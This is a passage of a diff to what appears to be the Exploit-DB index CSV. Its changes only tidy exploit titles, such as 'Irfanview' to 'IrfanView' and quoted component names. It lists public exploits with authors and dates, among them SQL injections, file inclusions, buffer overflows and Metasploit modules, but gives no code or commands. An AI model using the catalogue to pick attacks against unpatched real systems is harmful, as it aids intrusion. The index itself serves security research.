SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23 19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0 -19385,platforms/windows/dos/19385.txt,"Irfanview 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 +19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0 19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0 @@ -16860,7 +16860,7 @@ id,file,description,date,author,platform,type,port 19480,platforms/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 19481,platforms/php/webapps/19481.txt,"WordPress Plugin Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0 -19483,platforms/windows/dos/19483.txt,"Irfanview JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 +19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 @@ -16896,7 +16896,7 @@ id,file,description,date,author,platform,type,port 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce - Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 -19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,local,0 +19519,platforms/windows/local/19519.rb,"IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,local,0 19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Root Exploit (2)",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 @@ -16989,7 +16989,7 @@ id,file,description,date,author,platform,type,port 19607,platforms/windows/remote/19607.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0 19608,platforms/windows/remote/19608.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0 19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14b - Relative Path",1999-11-08,"Shawn Hillis",freebsd,local,0 -19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 +19610,platforms/windows/local/19610.c,"IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0 19612,platforms/windows/remote/19612.pl,"Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 - C&C Server Buffer Overflow (Metasploit)",2012-07-06,Metasploit,windows,remote,3460 @@ -18085,7 +18085,7 @@ id,file,description,date,author,platform,type,port 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote,0 -40423,platforms/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80 +40423,platforms/php/webapps/40423.txt,"Joomla! Component 'com_eventbooking' 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80 20765,platforms/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0 20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 @@ -19608,7 +19608,7 @@ id,file,description,date,author,platform,type,port 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0 -40413,platforms/php/webapps/40413.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80 +40413,platforms/php/webapps/40413.txt,"Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80 22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0 @@ -19961,8 +19961,8 @@ id,file,description,date,author,platform,type,port 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0 -22680,platforms/windows/dos/22680.txt,"Irfanview - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 -22681,platforms/windows/dos/22681.txt,"Irfanview - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 +22680,platforms/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 +22681,platforms/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos,0 @@ -20557,7 +20557,7 @@ id,file,description,date,author,platform,type,port 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0 23286,platforms/php/webapps/23286.txt,"Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 -23288,platforms/windows/dos/23288.txt,"Irfanview 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos,0 +23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - Cross-Site Request Forgery",2012-12-11,sajith,php,webapps,0 23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow (Metasploit)",2012-12-11,Metasploit,windows,remote,0 23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums - Multiple Fields HTML Injection",2003-10-30,ProXy,php,webapps,0 @@ -21901,7 +21901,7 @@ id,file,description,date,author,platform,type,port 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",linux,remote,0 24696,platforms/linux/dos/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)",2004-11-21,"Richard Hart",linux,dos,0 -24697,platforms/php/webapps/24697.txt,"Serendipity 0.x - exit.php HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0 +24697,platforms/php/webapps/24697.txt,"S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0 24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection",2004-10-21,"Florian Rock",php,webapps,0 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos,0 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,cgi,webapps,0 @@ -24460,7 +24460,7 @@ id,file,description,date,author,platform,type,port 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 -27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 +27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 @@ -24869,7 +24869,7 @@ id,file,description,date,author,platform,type,port 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter Cross-Site Scripting",2006-06-05,Luny,php,webapps,0 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php' catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 -27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - STOR Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0 +27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0 27704,platforms/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,windows,remote,0 27705,platforms/multiple/remote/27705.rb,"Java - storeImageArray() Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 @@ -24907,7 +24907,7 @@ id,file,description,date,author,platform,type,port 27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog Manipulation",2006-04-26,"Matthew Murphy",windows,remote,0 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,windows,dos,0 27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 -27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 - 'PASS' Buffer Overflow (SEH)",2013-08-21,Wireghoul,windows,remote,21 +27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 27751,platforms/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 @@ -25036,7 +25036,7 @@ id,file,description,date,author,platform,type,port 27876,platforms/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution (Metasploit)",2013-08-26,Metasploit,windows,remote,7770 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 -27879,platforms/php/webapps/27879.txt,"Joomla! Component VirtueMart 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 +27879,platforms/php/webapps/27879.txt,"Joomla! Component 'com_virtuemart' 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - popup.php Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0 27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 - ODP.php Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0 27882,platforms/java/dos/27882.java,"Sun Java Applet - Font.createFont Remote Denial of Service",2006-05-15,"Marc Schoenefeld",java,dos,0 @@ -25319,7 +25319,7 @@ id,file,description,date,author,platform,type,port 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 -28199,platforms/php/webapps/28199.txt,"phpBB 1.2.4 For Mambo - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0 +28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - Tiny_mce_gzip.php Directory Traversal",2006-07-10,armin390,php,webapps,0 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 @@ -25352,7 +25352,7 @@ id,file,description,date,author,platform,type,port 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0 -28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 +28233,platforms/php/webapps/28233.txt,"Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x - Server Date_Format Denial of Service",2006-07-18,"Christian Hammers",linux,dos,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0 @@ -25442,7 +25442,7 @@ id,file,description,date,author,platform,type,port 40639,platforms/windows/dos/40639.py,"Baby FTP server 1.24 - Denial of Service",2016-10-27,n30m1nd,windows,dos,0 28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0 28327,platforms/php/webapps/28327.txt,"VWar 1.x - war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0 -28328,platforms/windows/remote/28328.rb,"PCMan FTP Server 2.07 - STOR Command Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 +28328,platforms/windows/remote/28328.rb,"PCMan FTP Server 2.07 - 'STOR' Command Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28331,platforms/windows/remote/28331.txt,"Oracle Java - ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0 @@ -25483,7 +25483,7 @@ id,file,description,date,author,platform,type,port 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 -28369,platforms/windows/dos/28369.dpr,"Irfanview 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,windows,dos,0 +28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,windows,dos,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0 @@ -25508,7 +25508,7 @@ id,file,description,date,author,platform,type,port 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos,0 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0 -28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component - Reporter.sql.php Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 +28396,platforms/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 @@ -25516,20 +25516,20 @@ id,file,description,date,author,platform,type,port 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0 40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0 -28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 -28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 +28403,platforms/php/webapps/28403.txt,"Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 +28404,platforms/php/webapps/28404.txt,"Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (1)",2013-09-20,xistence,php,remote,0 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 -28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28410,platforms/php/webapps/28410.txt,"Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 28414,platforms/php/webapps/28414.txt,"cPanel 10.x - editit.html file Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 28415,platforms/php/webapps/28415.txt,"cPanel 10.x - showfile.html file Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 -28416,platforms/php/webapps/28416.txt,"Mambo EstateAgent 1.0.2 Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28416,platforms/php/webapps/28416.txt,"Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - TCMS_Administer Parameter Remote File Inclusion",2006-08-21,You_You,php,webapps,0 28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,php,webapps,0 @@ -25550,7 +25550,7 @@ id,file,description,date,author,platform,type,port 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 -28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Com_comprofiler 1.0 - class.php Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 +28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0 @@ -25671,7 +25671,7 @@ id,file,description,date,author,platform,type,port 28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 28561,platforms/multiple/dos/28561.pl,"Blast XPlayer - Local Buffer Overflow (PoC)",2013-09-26,flux77,multiple,dos,0 -28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery",2013-09-26,"Hubert Gradek",hardware,webapps,0 +28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery",2013-09-26,"Hubert Gradek",hardware,webapps,0 28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0 28564,platforms/php/webapps/28564.txt,"ArticleSetup - Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0 38990,platforms/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection",2015-12-15,"Linux Zone Research Team",php,webapps,80 @@ -25920,7 +25920,7 @@ id,file,description,date,author,platform,type,port 28815,platforms/php/webapps/28815.txt,"H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling 